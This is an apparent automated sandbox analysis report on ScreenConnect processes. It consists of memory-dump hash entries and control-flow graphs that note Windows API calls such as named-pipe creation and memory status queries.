                                                                                                                            • Opcode ID: 28f5dd36e57cb547878661e6727b8facb49154c4bb60febf01b3b5acd7ad702c
                                                                                                                            • Instruction ID: ac30488427b91dfc8fb917275d2c31b17789b7cc27fad0a371777ab9428c24de
                                                                                                                            • Opcode Fuzzy Hash: 28f5dd36e57cb547878661e6727b8facb49154c4bb60febf01b3b5acd7ad702c
                                                                                                                            • Instruction Fuzzy Hash: FC016811A0FD8A0FEB28AA6C88A48A03790EF5564075840FED85CCF0E7EC58F959C351
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b54ff4351654081c48cf4bd975847993fb7ed2df0878cc2ac8fa5bc5ac124369
                                                                                                                            • Instruction ID: 5e7bd2215186d8f3da26a514e2cafd332f512c4403f537b8ca4263ed0402e880
                                                                                                                            • Opcode Fuzzy Hash: b54ff4351654081c48cf4bd975847993fb7ed2df0878cc2ac8fa5bc5ac124369
                                                                                                                            • Instruction Fuzzy Hash: C4017121B1AD0D4FE7A4FABC547927862D2FBE825571145BED00DC72A6DD2868468340
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ffa5ea6c2c914d9c07f8b835e26df44127ec063587b5f0ba053a8218ba212093
                                                                                                                            • Instruction ID: 337613e887eeb22875cd77b50689704722973740c3fc7679ca488354334b2e99
                                                                                                                            • Opcode Fuzzy Hash: ffa5ea6c2c914d9c07f8b835e26df44127ec063587b5f0ba053a8218ba212093
                                                                                                                            • Instruction Fuzzy Hash: B1016832A0EB880FD7D5D67898682F17FE0EF95215B0901FFD888CB1B7EA54A941C302
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2ad745bb0d842059eda2c6d1b2276f6c0c6dfab6d044e2bab9dd84f3d9087df0
                                                                                                                            • Instruction ID: c3104e04e612527731f587febff174a372e6de60f07dce5956fcad62ea4e5eaf
                                                                                                                            • Opcode Fuzzy Hash: 2ad745bb0d842059eda2c6d1b2276f6c0c6dfab6d044e2bab9dd84f3d9087df0
                                                                                                                            • Instruction Fuzzy Hash: 9F01DB12D1F1964AE7245BF454B15E42BA1AF12614F0A02F7C8E8CF0E3DC4979918A50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2872e24242e1f23a24bd9c43944d6caedffdd13dacfedefec82eba0616ef96e5
                                                                                                                            • Instruction ID: b22c159a9af56e3bcb5dbc36d26aac0439b0668a4eb9c9156679c8220a378062
                                                                                                                            • Opcode Fuzzy Hash: 2872e24242e1f23a24bd9c43944d6caedffdd13dacfedefec82eba0616ef96e5
                                                                                                                            • Instruction Fuzzy Hash: AD01F521B1AE4E4BDBB8AF98542556033C2FFD874079941B9D01EC71EADD65FD228780
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 13e6e58ad02c00c5a6cc457fbc56340efc0a1bec31d78a353b00f4be872da875
                                                                                                                            • Instruction ID: 1586144a831b52911070e589f81a9eed07569a25bf2774547174d03ce6419da0
                                                                                                                            • Opcode Fuzzy Hash: 13e6e58ad02c00c5a6cc457fbc56340efc0a1bec31d78a353b00f4be872da875
                                                                                                                            • Instruction Fuzzy Hash: 6CF06D31B0C14E4FE768EE88E8627F83391EF85324F040479E16D87A93CE2A75268781
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ef311c57c76f9b83f24e417b6766b27d9a48a1b3c4ccc0619181361cace22166
                                                                                                                            • Instruction ID: 674d2d4f890d8607614148d8da2216c2dd490d130903e51d198a55a9a4602781
                                                                                                                            • Opcode Fuzzy Hash: ef311c57c76f9b83f24e417b6766b27d9a48a1b3c4ccc0619181361cace22166
                                                                                                                            • Instruction Fuzzy Hash: AB011A74B0B51B09FEB8AAD440B07F82692AF55301F46007CD86E8E1E7CE69FA15C260
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 70628c2b5b5ffa1ad65e7db339d06d39cfe0a2e3182bca0aeff3b10ec437e581
                                                                                                                            • Instruction ID: 44aec5f18d423e178af5c520f44faa5f0a4aac54f7c3d2d1a588fb36a38c912d
                                                                                                                            • Opcode Fuzzy Hash: 70628c2b5b5ffa1ad65e7db339d06d39cfe0a2e3182bca0aeff3b10ec437e581
                                                                                                                            • Instruction Fuzzy Hash: 2DE09BB114E50C6EA61CAA55AC079F7379CE747134F00112FE18E85012F566B5238295
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: efca4ebf7ac055c9985bc052e576a92cfaf2285c50280bdd1944b4bad9bbc1c3
                                                                                                                            • Instruction ID: 0a48a093e81d15da7bf0bae2b5678516de62c843efe382ba2948aa48495796af
                                                                                                                            • Opcode Fuzzy Hash: efca4ebf7ac055c9985bc052e576a92cfaf2285c50280bdd1944b4bad9bbc1c3
                                                                                                                            • Instruction Fuzzy Hash: 49F0E222B0FE8E8EE7A6D96C04252A439C2DB951A074A00BFC01DCB1B3DC14AC048341
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e4afdad185c95eca69a7449e5494a3192a027778fe118004f5bb9bc8561f60db
                                                                                                                            • Instruction ID: 8f198e78309ae7e757544bab139bdb73d5e748dd9c1cd62d25536d892da960cc
                                                                                                                            • Opcode Fuzzy Hash: e4afdad185c95eca69a7449e5494a3192a027778fe118004f5bb9bc8561f60db
                                                                                                                            • Instruction Fuzzy Hash: ADF02232A5EB880FD756AB3084761A47FB1FF42200B4400FEE468CB19BDE28A911C781
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0f615faa4d5305a0f85b395f50aef7c7711f7ab94ac009a29a08029b1aeaec8f
                                                                                                                            • Instruction ID: c89cdbd2b24c7204af5d76788626eb4e6de7f4a4530368979b0e1ec9c60d8d87
                                                                                                                            • Opcode Fuzzy Hash: 0f615faa4d5305a0f85b395f50aef7c7711f7ab94ac009a29a08029b1aeaec8f
                                                                                                                            • Instruction Fuzzy Hash: 2EF0303650968D9FCB46DB68D4568D5BF70FE16320B0501C7E059CB062D7219A95CB82
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d8ae9f35a19434dcfdc42ae86fd4cf90c015e4b2a84b43e29db0d71913e0041d
                                                                                                                            • Instruction ID: 889d66e0ec775efef4eaa02a6a76d0b84022370614daaf1aabd274b8ab407124
                                                                                                                            • Opcode Fuzzy Hash: d8ae9f35a19434dcfdc42ae86fd4cf90c015e4b2a84b43e29db0d71913e0041d
                                                                                                                            • Instruction Fuzzy Hash: 03E0D82054D6860FDB469B38C4E88E13FB0FF1631034900EAE844CE0A3E914D585C751
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2a0510852abb481aaf03ae8c5044e2ecc14e89fc97950d054fd83bd4a9f90aa4
                                                                                                                            • Instruction ID: 8e4ba89299944d5367cc6af8c218f509a8f03e4a6b3fa9cc6e2a4ea8c991a2ef
                                                                                                                            • Opcode Fuzzy Hash: 2a0510852abb481aaf03ae8c5044e2ecc14e89fc97950d054fd83bd4a9f90aa4
                                                                                                                            • Instruction Fuzzy Hash: 89E08C16A4EA0B02FB7C61E678A17B560D18F04301F0A40BEA429841E9CDACAED18192
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6250ad99ffc0fe415ab7ef1d8f1c6f69dc9874baa9cb790656fe0310b0acf45b
                                                                                                                            • Instruction ID: 5bde48afa4bc554ea1e6afa5ba44f8b852a06890e221f9aa4079caa1d4001f3b
                                                                                                                            • Opcode Fuzzy Hash: 6250ad99ffc0fe415ab7ef1d8f1c6f69dc9874baa9cb790656fe0310b0acf45b
                                                                                                                            • Instruction Fuzzy Hash: D7E0D860F2EA8A0BD769FB6444259B97281EF64300B0541FDC49D971D7DC68F9118381
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 94130c32cc00c6f2a59a17f772e2e8ad64dd7b18aea42f3b2dbfbb97e9717321
                                                                                                                            • Instruction ID: 914bd6007175019a208d8cb1401feb5bbe5e7bc3ab64b0c14bb6b3fc3eb8c0ed
                                                                                                                            • Opcode Fuzzy Hash: 94130c32cc00c6f2a59a17f772e2e8ad64dd7b18aea42f3b2dbfbb97e9717321
                                                                                                                            • Instruction Fuzzy Hash: 34E0C23161DA094FE789EB4CD4A2DA5F3E0FB98258F80063EE04DD2260DA69E6808701
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.3601711961.00007FFD9B650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B650000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_7ffd9b650000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ce02d3b2ffeea84278770489b2d814af10f11c530b9ccffef801fb05cd4af5da
                                                                                                                            • Instruction ID: 5de26906aaeb98abac6036b5a4b97fa3e10319a01dd851137efd7473df418f9d
                                                                                                                            • Opcode Fuzzy Hash: ce02d3b2ffeea84278770489b2d814af10f11c530b9ccffef801fb05cd4af5da
                                                                                                                            • Instruction Fuzzy Hash: 30C09B10F1A54E56F664FFE444751BD21536F89300B538479D05D851E6CD3C77115545

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:13.8%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:16
                                                                                                                            Total number of Limit Nodes:2
                                                                                                                            execution_graph 14765 7ffd9b649114 14769 7ffd9b64911d 14765->14769 14766 7ffd9b6492c7 GlobalMemoryStatusEx 14767 7ffd9b6492e5 14766->14767 14768 7ffd9b649212 14769->14766 14769->14768 14770 7ffd9b338014 14772 7ffd9b33801d 14770->14772 14771 7ffd9b338082 14772->14771 14773 7ffd9b3380f6 SetProcessMitigationPolicy 14772->14773 14774 7ffd9b338152 14773->14774 14757 7ffd9b333662 14758 7ffd9b3565d0 ConnectNamedPipe 14757->14758 14760 7ffd9b356682 14758->14760 14761 7ffd9b333642 14762 7ffd9b356030 CreateNamedPipeW 14761->14762 14764 7ffd9b356163 14762->14764

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 432 7ffd9b649114-7ffd9b64911b 433 7ffd9b64911d-7ffd9b649125 432->433 434 7ffd9b649126-7ffd9b649179 432->434 433->434 437 7ffd9b64917b-7ffd9b64918a 434->437 438 7ffd9b6491e7 434->438 444 7ffd9b6491d4-7ffd9b6491e5 437->444 445 7ffd9b64918c-7ffd9b6491b5 437->445 440 7ffd9b6491e9-7ffd9b6491ed 438->440 441 7ffd9b649258-7ffd9b649259 438->441 446 7ffd9b64926e-7ffd9b64926f 440->446 447 7ffd9b6491ef-7ffd9b6491f1 440->447 442 7ffd9b64925b-7ffd9b64926c 441->442 443 7ffd9b6492c7-7ffd9b6492e3 GlobalMemoryStatusEx 441->443 455 7ffd9b64926d 442->455 449 7ffd9b6492eb-7ffd9b649312 443->449 450 7ffd9b6492e5 443->450 444->438 452 7ffd9b64920e 445->452 453 7ffd9b6491b7-7ffd9b6491ba 445->453 456 7ffd9b649270-7ffd9b649271 446->456 457 7ffd9b6492b9-7ffd9b6492c4 446->457 454 7ffd9b6491f3-7ffd9b6491f7 447->454 447->455 450->449 458 7ffd9b64920f 452->458 459 7ffd9b64923b-7ffd9b64923f 453->459 460 7ffd9b6491bc-7ffd9b6491be 453->460 461 7ffd9b649273-7ffd9b649278 454->461 462 7ffd9b6491f9 454->462 455->446 456->461 457->443 463 7ffd9b649210 458->463 464 7ffd9b64928b-7ffd9b64928e 458->464 480 7ffd9b649240 459->480 466 7ffd9b6491c0 460->466 467 7ffd9b64923a 460->467 469 7ffd9b649279-7ffd9b64927e 461->469 462->459 468 7ffd9b6491fb-7ffd9b6491fd 462->468 470 7ffd9b649291-7ffd9b6492b7 463->470 471 7ffd9b649211 463->471 464->470 472 7ffd9b6491c2-7ffd9b6491c4 466->472 473 7ffd9b649203 466->473 467->459 468->469 474 7ffd9b6491ff-7ffd9b649201 468->474 476 7ffd9b64927f-7ffd9b649283 469->476 470->457 478 7ffd9b649212-7ffd9b649239 471->478 479 7ffd9b649253-7ffd9b649257 471->479 472->480 481 7ffd9b6491c6 472->481 473->476 482 7ffd9b649205 473->482 474->473 483 7ffd9b649285-7ffd9b64928a 476->483 478->467 479->441 484 7ffd9b649209 481->484 485 7ffd9b6491c8-7ffd9b6491ca 481->485 486 7ffd9b649206-7ffd9b649207 482->486 487 7ffd9b649247-7ffd9b649249 482->487 483->464 484->483 488 7ffd9b64920b-7ffd9b64920d 484->488 492 7ffd9b6491cc 485->492 493 7ffd9b649246 485->493 486->484 489 7ffd9b64924f 487->489 490 7ffd9b64924b-7ffd9b64924e 487->490 488->452 495 7ffd9b649252 489->495 496 7ffd9b649250-7ffd9b649251 489->496 490->489 492->458 494 7ffd9b6491ce-7ffd9b6491d1 492->494 493->487 494->496 497 7ffd9b6491d3 494->497 495->479 496->495 497->444
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.1853621031.00007FFD9B640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B640000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_7ffd9b640000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: GlobalMemoryStatus
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1890195054-0
                                                                                                                            • Opcode ID: 141e36ac47cec0f7182c630be994109703f2ab03120e9998e2a6eb01938f5758
                                                                                                                            • Instruction ID: d602876a3284b0ae6219949718836f157086a56ab7c7314ff4316bd2bc867cb8
                                                                                                                            • Opcode Fuzzy Hash: 141e36ac47cec0f7182c630be994109703f2ab03120e9998e2a6eb01938f5758
                                                                                                                            • Instruction Fuzzy Hash: FD814831A4EA8D4FE775D6A948297AA3FE1FF53320F0541BAC06CCB5E3DA18750A8740

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.1848125764.00007FFD9B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B330000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_7ffd9b330000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MitigationPolicyProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1088084561-0
                                                                                                                            • Opcode ID: 4426105770d9b995ed391f7ad8d628b463d984abe7c928fbd0ec8e09c892124e
                                                                                                                            • Instruction ID: ddd9b3fb106999394c20c9bc70af7dd7945b26668df4d7bd62e91ed08aa355eb
                                                                                                                            • Opcode Fuzzy Hash: 4426105770d9b995ed391f7ad8d628b463d984abe7c928fbd0ec8e09c892124e
                                                                                                                            • Instruction Fuzzy Hash: BD514C31D0DB494FD724EFA8984A5EA7BE0EF55310F04027FE489C31A2DE78A4468B91

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 517 7ffd9b333642-7ffd9b35609a 520 7ffd9b3560a4-7ffd9b356161 CreateNamedPipeW 517->520 521 7ffd9b35609c-7ffd9b3560a1 517->521 523 7ffd9b356163 520->523 524 7ffd9b356169-7ffd9b35619c 520->524 521->520 523->524
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.1848125764.00007FFD9B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B330000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_7ffd9b330000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateNamedPipe
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2489174969-0
                                                                                                                            • Opcode ID: fbc51ac57d67c96b62217307efdf02dd76d1d574f9c7982ad930fd14c9db2a97
                                                                                                                            • Instruction ID: b002b53d13f680c5ac3ac3ba730e9065c8a01d89217a99d69dbf2d856aaccb79
                                                                                                                            • Opcode Fuzzy Hash: fbc51ac57d67c96b62217307efdf02dd76d1d574f9c7982ad930fd14c9db2a97
                                                                                                                            • Instruction Fuzzy Hash: D851907191CA1C8FDB68EF5C9845BE9B7E0FB59720F0442AEE44ED3251CB70A9818BC1

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 526 7ffd9b333662-7ffd9b356680 ConnectNamedPipe 530 7ffd9b356682 526->530 531 7ffd9b356688-7ffd9b3566d0 call 7ffd9b3566d1 526->531 530->531
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.1848125764.00007FFD9B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B330000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_7ffd9b330000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConnectNamedPipe
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2191148154-0
                                                                                                                            • Opcode ID: c4358d900b8ec29dc8d2cd28c30f7080fb5e39c0df9bb6637a75156b139881e2
                                                                                                                            • Instruction ID: 2ceedd0aa25248c250805ade7601ff55962501b111d200f3de2377fc4ee889ed
                                                                                                                            • Opcode Fuzzy Hash: c4358d900b8ec29dc8d2cd28c30f7080fb5e39c0df9bb6637a75156b139881e2
                                                                                                                            • Instruction Fuzzy Hash: AB317C70E08A1C8FDB58EF98C849BE9B7F0FB59311F00826AD00DD7256DB70A945CB81

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 535 7ffd9b333aa2-7ffd9b3380ef 537 7ffd9b3380f6-7ffd9b338150 SetProcessMitigationPolicy 535->537 538 7ffd9b338152 537->538 539 7ffd9b338158-7ffd9b338187 537->539 538->539
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.1848125764.00007FFD9B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B330000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_7ffd9b330000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MitigationPolicyProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1088084561-0
                                                                                                                            • Opcode ID: 7196992f19a421767051abe27e1ac57baf6faf449e63394e88a40a8d8c08774f
                                                                                                                            • Instruction ID: a8ff0f8e985dda82218e5d30736c19eec1e9d0fd2be12f1f13c67172ae0985db
                                                                                                                            • Opcode Fuzzy Hash: 7196992f19a421767051abe27e1ac57baf6faf449e63394e88a40a8d8c08774f
                                                                                                                            • Instruction Fuzzy Hash: 4121A731918B188FDB28AF9D984AAFAB7E0EB55711F00423EE449D3251DB74B8458B91